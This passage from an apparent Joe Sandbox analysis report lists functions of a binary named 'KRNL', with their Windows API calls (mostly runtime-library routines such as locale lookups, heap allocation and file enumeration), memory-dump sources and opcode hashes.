                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006EAFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,006E8A2A,?,?,006EAF87,006E8A2A,?,006EAF58,006E8A2A,?,?,?), ref: 006EAFD0
                                                                                                                                                                                                                                                          • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,AB1687B8,?,?,?,Function_0002BE94,000000FF), ref: 006EB0C7
                                                                                                                                                                                                                                                            • Part of subcall function 006EAEFA: std::_Throw_Cpp_error.LIBCPMT ref: 006EAF1B
                                                                                                                                                                                                                                                            • Part of subcall function 006EEFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,006E8E4A,006EA2F0), ref: 006EEFE7
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3627539351-0
                                                                                                                                                                                                                                                          • Opcode ID: 6f8d09bf14bf78d0080f430f1551d341a3d603698602b6a9709ad00edad1cb47
                                                                                                                                                                                                                                                          • Instruction ID: 5776a58ec47a686e510e7026b3abeadd951e08d94b06d5a3dbf1affce1193980
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f8d09bf14bf78d0080f430f1551d341a3d603698602b6a9709ad00edad1cb47
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0211083260178197CB256B6ADC11AAE77A7EB40B30F14841EF4119B7D0DB39F800CA5D
                                                                                                                                                                                                                                                          Function 006FCFD6 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ca8a213f58c9f77bdccfe9b822b1dedc6726edb08a12a592a492df5f920c21a0
                                                                                                                                                                                                                                                          • Instruction ID: 207fd71e75b8dbb90d5d2ddab558da24ba0b0f770407f275b6651fdebc204a45
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca8a213f58c9f77bdccfe9b822b1dedc6726edb08a12a592a492df5f920c21a0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB01B53321022DAF9B168F6CEC42DB63367BBD4760B25C125FA14971D4DF31E8029798
                                                                                                                                                                                                                                                          Function 006ECB32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3988221542-0
                                                                                                                                                                                                                                                          • Opcode ID: 96a6538addf4564e78c5d26393b0647f342f818839c202494ba64e53a08901f5
                                                                                                                                                                                                                                                          • Instruction ID: 66660ba0bf8e10886c9b14ff7c9f74354ea694ccfb8713580da69d79b42cd78b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96a6538addf4564e78c5d26393b0647f342f818839c202494ba64e53a08901f5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC0144B760A3C65ECB459B7EF92A6E8BB22FF96334B3041AFD111846C1DB129857C700
                                                                                                                                                                                                                                                          Function 006E7770 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Concurrency::details::_Release_chore.LIBCPMT ref: 006E77C6
                                                                                                                                                                                                                                                            • Part of subcall function 006EAF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,006E78DA,00000000), ref: 006EAF72
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 312417170-0
                                                                                                                                                                                                                                                          • Opcode ID: f191cef12bd4acb898397c314ee240495c49e0f562f65fae248f65560a91a530
                                                                                                                                                                                                                                                          • Instruction ID: 23590ce9b480d5ff72bedd608b51aefe5b82b06fd0bb07d4f19f367cbe1af399
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f191cef12bd4acb898397c314ee240495c49e0f562f65fae248f65560a91a530
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44018BB1C003499BCB00EF88DC0579EBBB4FB44720F004239E8096B340E339AA41CBD2
                                                                                                                                                                                                                                                          Function 006FBF11 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,006FDF35,?,?,006FDF35,00000220,?,00000000,?), ref: 006FBF43
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: 09119fd15b54bad78d59d7b767e4f2d2ce205d5f10919fa2cfd2db501a6af5d6
                                                                                                                                                                                                                                                          • Instruction ID: 5e399d5e231a650f0ec5a33978bf23f531aa2b9bd9dbe3e285bc4ff450a2ce8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09119fd15b54bad78d59d7b767e4f2d2ce205d5f10919fa2cfd2db501a6af5d6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAE0653120756DA6DA212A69ED01BFA364AAF417B0F155161EF5D962D0DB20DC00C9A9
                                                                                                                                                                                                                                                          Function 006E98F0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 006E990F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                                          • Opcode ID: 6619770378216d3df83a9974e88a90e62222697532cf1a149cc2af2a5e6ba051
                                                                                                                                                                                                                                                          • Instruction ID: 1d78761b8fd9142918270acd56c53ae44c0001f1e4c8f63f328d5d34c192012e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6619770378216d3df83a9974e88a90e62222697532cf1a149cc2af2a5e6ba051
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80D05E397021644B87147B2DA8188AE6362AFC872035A846DE940D7386C728EC428680

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          Function 00701287 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0070138F
                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 007013CD
                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 007013E0
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00701428
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00701443
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                          • String ID: ,Kq
                                                                                                                                                                                                                                                          • API String ID: 415426439-4204376562
                                                                                                                                                                                                                                                          • Opcode ID: d8cea7d7afdb3925fa323ab02ecbb2c04eca52e343b7ffc1241e56b00816ce74
                                                                                                                                                                                                                                                          • Instruction ID: 8742ae4081815cfe086529e807c8d4fe040462c643a15d035f11897888423dd3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8cea7d7afdb3925fa323ab02ecbb2c04eca52e343b7ffc1241e56b00816ce74
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06514EB1A00209EBDB10DFA5DC45ABEB7F8BF45700F958669F901E71D0E7789A408B61
                                                                                                                                                                                                                                                          Function 00707792 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                          • Opcode ID: 144d49f1a4418681aa83cd4e3c99419f7e23af40b258b9ac570496c8eedcf0eb
                                                                                                                                                                                                                                                          • Instruction ID: cf9c2b692fa4256e051d64561d26d851e4790d5f76afb2cd7ad430101c6fc11c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 144d49f1a4418681aa83cd4e3c99419f7e23af40b258b9ac570496c8eedcf0eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FED21871E08229CFDB65CE28CD447EAB7F5EB44305F1442EAD44DA7281EB78AE858F41
                                                                                                                                                                                                                                                          Function 00701A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,007013BD,00000002,00000000,?,?,?,007013BD,?,00000000), ref: 00701AA0
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,007013BD,00000002,00000000,?,?,?,007013BD,?,00000000), ref: 00701AC9
                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,007013BD,?,00000000), ref: 00701ADE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                          • Opcode ID: c5571135d027d6747782e181728e057ce2e3614bac7e1ea0d3e9794a7d1657ad
                                                                                                                                                                                                                                                          • Instruction ID: 3caf728f46d057cb60f71af56788e373c4dbfaf0e9ebf429d7a3d06cf04c9499
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5571135d027d6747782e181728e057ce2e3614bac7e1ea0d3e9794a7d1657ad
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 112186A2B02100EADB34CF58C900AD772EAEB54B54BD6C664E90AD7184F73ADD40C390
                                                                                                                                                                                                                                                          Function 006F9CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                          • Instruction ID: 24fc032901f1b22d41496aaac67efc380e69dd7f29fb06294d7f9bb03791442a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8022CB1E012199BDF14CFA8D880BEEB7B2FF49314F258269D619E7341D731AA41CB94
                                                                                                                                                                                                                                                          Function 00701FE9 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 007020D9
                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 007021CD
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0070220C
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0070223F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1164774033-0
                                                                                                                                                                                                                                                          • Opcode ID: 66c6c54dcd45d088b54bc4d7a1f11033e1a42bb17f1b240b4133cf501d63b5f7
                                                                                                                                                                                                                                                          • Instruction ID: 53b1c9723cd79afb3acb04f43122748ecbfddf754818e62590f5e0b48ed497e6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66c6c54dcd45d088b54bc4d7a1f11033e1a42bb17f1b240b4133cf501d63b5f7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E971057290515CEEDF21AF24DC8DAFAB7F9AB05300F1442D9E14893292DB385E868F14
                                                                                                                                                                                                                                                          Function 006EF8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006EF8F5
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 006EF9C1
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006EF9DA
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 006EF9E4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
